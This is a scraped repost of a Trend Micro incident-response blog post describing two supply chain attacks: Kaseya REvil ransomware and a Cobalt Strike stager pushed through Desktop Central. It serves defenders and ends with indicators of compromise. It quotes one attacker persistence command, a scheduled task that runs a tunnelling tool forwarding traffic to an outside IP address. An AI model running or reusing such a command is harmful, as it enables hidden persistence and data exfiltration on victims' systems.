{"id":42142,"date":"2021-08-04T00:00:00","date_gmt":"2021-08-04T00:00:00","guid":{"rendered":"https:\/\/www.trendmicro.com\/en_us\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-persp.html"},"modified":"2021-08-04T00:00:00","modified_gmt":"2021-08-04T00:00:00","slug":"supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/","title":{"rendered":"Supply Chain Attacks from a Managed Detection and Response Perspective"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-641.png\">
<body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"51.073185303196\"> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"1554465412\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"10.5\">\n<div class=\"article-details\" role=\"heading\" readability=\"41\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Malware<\/p>\n<p class=\"article-details__description\">In this blog entry, we will take a look at two examples of supply chain attacks that our Managed Detection and Response (MDR) team encountered in the past couple of months.<\/p>\n<p class=\"article-details__author-by\">By: Ryan Maglaque, Jessie Prevost, Joelson Soares, Janus Agcaoili <time class=\"article-details__date\">August 04, 2021<\/time> <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"42.394420903955\">\n<div readability=\"32.391242937853\">\n<p>Modern technology has made managing large IT environments much less daunting
compared to the past, when each endpoint had to be manually configured and maintained. Many organizations now use tools and IT solutions that allow centralized management of endpoints, making it possible to update, troubleshoot, and deploy applications from a remote location.<\/p>\n<p>However, this convenience comes at a price \u2014 just as IT staff can access machines from a single location, the centralized nature of modern tech infrastructure also means that malicious actors can target the primary hub to gain access to the whole system. Even more concerning, cybercriminals no longer even have to launch a direct attack against an organization \u2014 they can bypass security measures by <a href=\"https:\/\/www.trendmicro.com\/vinfo\/ph\/security\/news\/virtualization-and-cloud\/supply-chain-attacks-cloud-computing\">focusing on their target\u2019s supply chain<\/a>. For example, instead of trying to find weak points in the system of a large organization that will likely have strong defenses, an attacker can target smaller companies that develop software for larger enterprises.<\/p>\n<p>In this blog entry, we will take a look at two examples of supply chain attacks that our Managed Detection and Response (MDR) team encountered in the past couple of months.<\/p>\n<p>On July 2, during the peak of the <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/g\/it-management-platform-kaseya-hit-with-sodinokibi-revil-ransomwa.html\">Kaseya ransomware incident<\/a>, we alerted one of our customers, notifying them about ransomware detections in their system.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-1.jpg\" alt=\"Figure 1. The timeline of the incident\"><figcaption>Figure 1. 
The timeline of the incident<\/figcaption><\/figure>\n<\/p><\/div>\n<div>\n<div class=\"richText\" readability=\"35.716326530612\">\n<div readability=\"18.340816326531\">\n<p>Our investigation found suspicious activity when the file AgentMon.exe, which is part of the Kaseya Agent, spawned another file, cmd.exe, which is responsible for creating the payload agent.exe, which in turn dropped MsMpEng.exe.<\/p>\n<p>By expanding our root cause analysis (RCA) and checking the argument for cmd.exe, we were able to see a few items before the execution of the ransomware. This initial set of indicators of compromise (IoCs) is similar to the ones discussed in <a href=\"https:\/\/www.huntress.com\/blog\/rapid-response-kaseya-vsa-mass-msp-ransomware-incident\">another blog post<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-2.jpg\" alt=\"Figure 2. Vision One console showing the attack\u2019s infection chain\"> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-2-2.jpg\" alt=\"Figure 2. Vision One console showing the attack\u2019s infection chain\"><figcaption>Figure 2. Vision One console showing the attack\u2019s infection chain<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>We found that the malware attempted to disable the anti-malware and anti-ransomware features of Windows Defender via PowerShell commands. 
It also copied the Windows command-line program Certutil.exe to \u201cC:\\Windows\\cert.exe\u201d, which is used to decode the payload file agent.crt, with the output given the name agent.exe. Agent.exe is then used to create the file MsMpEng.exe, a version of Windows Defender that is vulnerable to DLL side-loading.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-3.jpg\" alt=\"Figure 3. Details of the threat\"><figcaption>Figure 3. Details of the threat<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"40.5\">\n<div readability=\"26\">\n<p>Machine learning detection capabilities managed to block and detect the ransomware. However, the protection module was not activated in all the security agents of Trend Micro Apex One\u2122, so the organization\u2019s support requested the team to check their product settings. Because the process chain showed that the ransomware came from a Kaseya agent, we requested our customer to isolate the Kaseya servers to contain the threat.<\/p>\n<p>A few hours later, Kaseya released a notice to their users to immediately shut down their Virtual System\/Server Administrator (VSA) server until further notice.<\/p>\n<p>The second supply chain incident handled by our MDR team starts with an alert to a customer that notified them of a credential dump occurring in their Active Directory (AD). The Incident View in Trend Micro Vision One\u2122\ufe0f aggregated other detections into a single view, providing additional information on the scope of the threat. 
From there, we were able to see a server, an endpoint, and a user related to the threat.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-4.jpg\" alt=\"Figure 4. Vision One\u2019s incident view showing the threat\u2019s details \"><figcaption>Figure 4. Vision One\u2019s incident view showing the threat\u2019s details <\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>Our threat hunting team also noted suspicious behavior related to WmiExec. Further investigation of the affected hosts\u2019 Ownership Alignment Tools (OATs) shows a related entry for persistence:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">C:\\Windows\\System32\\schtasks.exe \/CREATE \/RU SYSTEM \/SC HOURLY \/TN &#8220;Windows Defender&#8221; \/TR &#8220;powershell.exe C:\\Windows\\System.exe -L rtcp:\/\/0.0.0.0:1035\/127.0.0.1:25 -F mwss:\/\/52.149.228.45:443&#8221; \/ST 12:00<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-5.jpg\" alt=\"Figure 5. OAT flagging a suspicious creation of a scheduled task\"><figcaption>Figure 5. OAT flagging a suspicious creation of a scheduled task<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.179425837321\">\n<div readability=\"13.464114832536\">\n<p>We found scheduled tasks being utilized as a persistence mechanism for the file System.exe. 
Further analysis of this file shows that it is related to <a href=\"https:\/\/github.com\/ginuerzh\/gost\">GO simple tunnel<\/a>, which is used to forward network traffic to an IP address depending on the argument.<\/p>\n<p>Checking the initial alert revealed a file common to the two hosts, which prompted us to check the IOC list to determine the other affected hosts in the environment.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-6.jpg\" alt=\"Figure 6. Discovery commands and access to a malicious domain evident in the process chain\"><figcaption>Figure 6. Discovery commands and access to a malicious domain evident in the process chain<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.5\">\n<div readability=\"16\">\n<p>Expanding the nodes from the RCA allowed us to gather additional IOCs that showed setup0.exe creating the file elevateutils.exe. In addition, elevateutils.exe was seen querying the domain vmware[.]center, which is possibly the threat\u2019s command-and-control (C&amp;C) server. We also discovered the earliest instance of setup0.exe in one of the hosts.<\/p>\n<p>The sample setup0.exe is an installer for elevateutils.exe, which seems to be a Cobalt Strike Beacon Malleable C&amp;C stager based on our analysis. The installer may have been used to masquerade as a normal file installation.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-7.jpg\" alt=\"Figure 7. 
The presence of EICAR strings is an indicator of elevateutils.exe being a Cobalt Strike Beacon\"><figcaption>Figure 7. The presence of EICAR strings is an indicator of elevateutils.exe being a Cobalt Strike Beacon<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"44.5\">\n<div readability=\"34\">\n<p>The stager elevateutils.exe will try to load the DLL chartdir60.dll, which will in turn read the contents of manual.pdf (these are also dropped by the installer in the same directory as elevateutils.exe). It will then decrypt, load, and execute shellcode in memory that will access the URL vmware[.]center\/mV6c.<\/p>\n<p>It makes use of VirtualAlloc, VirtualProtect, CreateThread, and a function to decrypt the shellcode to load and execute in memory. It also uses indirect API calls after decryption in a separate function, then uses JMP EAX to call the function as needed, which is not a routine or behavior that a normal file should have.<\/p>\n<p>Since it\u2019s possible that this is a Cobalt Strike Malleable C&amp;C stager, further behaviors may be dependent on what is downloaded from the accessed URL. However, because the URL was inaccessible at the time of writing this blog post, we were unable to observe and\/or verify other behaviors.<\/p>\n<p>Use of the Progressive RCA of Vision One allowed us to see how elevateutils.exe was created, as well as its behaviors. The malicious file was deployed via a Desktop Central agent.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-8.jpg\" alt=\"Figure 8. Viewing the behaviors of elevateutils.exe\"><figcaption>Figure 8. 
Viewing the behaviors of elevateutils.exe<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-perspective\/mdr-supply-chain-9.jpg\" alt=\"Figure 9. The console showing the attack\u2019s infection chain \"><figcaption>Figure 9. The console showing the attack\u2019s infection chain <\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"45.522190745987\">\n<div readability=\"36.61567516525\">\n<p>Based on these findings, our recommendation to the customer was to check the logon logs of the affected application to verify any suspicious usage of accounts during the time the threat was deployed.<\/p>\n<p>Because the environment was closely monitored, the threat was stopped after the credential dump. Furthermore, the IOCs (IP addresses and hashes) were added to the suspicious objects list to block them while waiting for detections. Further monitoring was done and no other suspicious behavior was seen.<\/p>\n<p>As businesses become more interconnected, a successful supply chain attack has the potential to cause a significant amount of damage to affected organizations. We can expect to see more of these in the future, as they often lead to the same results as a direct attack while providing a wider attack surface for malicious actors to exploit.<\/p>\n<p>Supply chain attacks are difficult to track because the targeted organizations often do not have full access to what\u2019s going on security-wise with their supply chain partners. This can often be exacerbated by security lapses within the company itself. 
For example, products and software may have configurations \u2014 such as folder exclusions and suboptimal implementation of detection modules \u2014 that make threats more difficult to notice.<\/p>\n<p>Security audits are also a very important step in securing the supply chain. Even if third-party vendors are known to be trustworthy, security precautions should still be deployed in case there are compromised accounts or even insider threats.<\/p>\n<p><a href=\"https:\/\/www.trendmicro.com\/en_ph\/business\/products\/detection-response.html\">Trend Micro Vision One<\/a> offers organizations the ability to detect and respond to threats across multiple security layers. It provides enterprises options to deal with threats such as the ones discussed in this blog entry:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">It can isolate endpoints, which are often the source of infection, until they are fully cleaned or the investigation is done.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">It can block IOCs related to the threat, including hashes, IP addresses, or domains found during analysis.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">It can collect files for further investigation.<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p><span class=\"body-subhead-title\">Indicators of Compromise (IoCs)<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<p><span class=\"body-subhead-title\">Incident # 1<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"4\">\n<tr>\n<td width=\"384\" valign=\"top\">\n<p><b>SHA256<\/b><\/p>\n<\/td>\n<td width=\"174\" valign=\"top\">\n<p><b>Detection name<\/b><\/p>\n<\/td>\n<td width=\"65\" 
valign=\"top\">\n<p><b>Details<\/b><\/p>\n<\/td>\n<\/tr>\n<tr readability=\"6\">\n<td width=\"384\" valign=\"top\" readability=\"5\">\n<p>8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd<\/p>\n<\/td>\n<td width=\"174\" valign=\"top\" readability=\"5\">\n<p>Ransom.Win32.SODINOKIBI.YABGC<\/p>\n<\/td>\n<td width=\"65\" valign=\"top\">\n<p>mpsvc.dll<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"6\">\n<td width=\"384\" valign=\"top\" readability=\"5\">\n<p>d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e<\/p>\n<\/td>\n<td width=\"174\" valign=\"top\" readability=\"5\">\n<p>Trojan.Win32.SODINSTALL.YABGC<\/p>\n<\/td>\n<td width=\"65\" valign=\"top\">\n<p>agent.exe<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<p><span class=\"body-subhead-title\">Incident # 2<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"5\">\n<tr>\n<td width=\"417\" valign=\"top\">\n<p><b>SHA256<\/b><\/p>\n<\/td>\n<td width=\"133\" valign=\"top\">\n<p><b>Detection name<\/b><\/p>\n<\/td>\n<td width=\"73\" valign=\"top\">\n<p><b>Details<\/b><\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"417\" valign=\"top\" readability=\"5\">\n<p>5e0f28bd2d49b73e96a87f5c20283ebe030f4bb39b3107d4d68015dce862991d<\/p>\n<\/td>\n<td width=\"133\" valign=\"top\">\n<p>HackTool.Win64.Gost.A<\/p>\n<\/td>\n<td width=\"73\" valign=\"top\">\n<p>System.exe<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"417\" valign=\"top\" readability=\"5\">\n<p>116af9afb2113fd96e35661df5def2728e169129bedd6b0bb76d12aaf88ba1ab<\/p>\n<\/td>\n<td width=\"133\" valign=\"top\">\n<p>&nbsp;Trojan.Win32.COBALT.AZ<\/p>\n<\/td>\n<td width=\"73\" valign=\"top\">\n<p>Setup0.exe<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"417\" valign=\"top\" 
readability=\"5\">\n<p>f52679c0a6196494bde8b61326d753f86fa0f3fea9d601a1fc594cbf9d778b12<\/p>\n<\/td>\n<td width=\"133\" valign=\"top\">\n<p>Trojan.Win32.COBALT.BA<\/p>\n<\/td>\n<td width=\"73\" valign=\"top\">\n<p>chartdir60.dll<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"417\" valign=\"top\" readability=\"5\">\n<p>c59ad626d1479ffc4b6b0c02ca797900a09553e1c6ccfb7323fc1cf6e89a9556<\/p>\n<\/td>\n<td width=\"133\" valign=\"top\">\n<p>Trojan.PDF.COBALT.AA<\/p>\n<\/td>\n<td width=\"73\" valign=\"top\">\n<p>manual.pdf<\/p>\n<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td width=\"417\" valign=\"top\" readability=\"5\">\n<p>f4f25ce8cb5825e0a0d76e82c54c25a2e76be3675b8eeb511e2e8a0012717006<\/p>\n<\/td>\n<td width=\"133\" valign=\"top\">\n<p>Trojan.Win32.COBALT.BA<\/p>\n<\/td>\n<td width=\"73\" valign=\"top\">\n<p>elevateutils.exe<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<h3><span class=\"body-subhead-title\">IP addresses and domains<\/span><\/h3>\n<ul>\n<li><span class=\"rte-red-bullet\">185[.]215[.]113[.]213<\/span><\/li>\n<li><span class=\"rte-red-bullet\">vmware[.]center<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/h\/supply-chain-attacks-from-a-managed-detection-and-response-persp.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this blog entry, we will take a look at two examples of supply chain attacks that our Managed Detection and Response (MDR) team encountered in the past couple of months. 
Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":42143,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9508,9513,9539,9509],"class_list":["post-42142","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-endpoints","tag-trend-micro-research-malware","tag-trend-micro-research-ransomware","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.7 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2021-08-04T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2021\/08\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1428\" \/>\n\t<meta property=\"og:image:height\" content=\"446\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst\",\"datePublished\":\"2021-08-04T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/\"},\"wordCount\":1639,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Malware\",\"Trend Micro Research : Ransomware\",\"Trend Micro Research : 
Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/\",\"name\":\"Supply Chain Attacks from a Managed Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg\",\"datePublished\":\"2021-08-04T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/08\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst.jpg\",\"width\":1428,\"height\":446},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/supply-chain-attacks-from-a-managed-detection-and-response-perspective-threats-analyst-threats-analyst-threats-analyst-threats-analyst\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Supply Chain Attacks from a Managed 
Detection and Response Perspective Threats Analyst Threats Analyst Threats Analyst Threats Analyst\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence 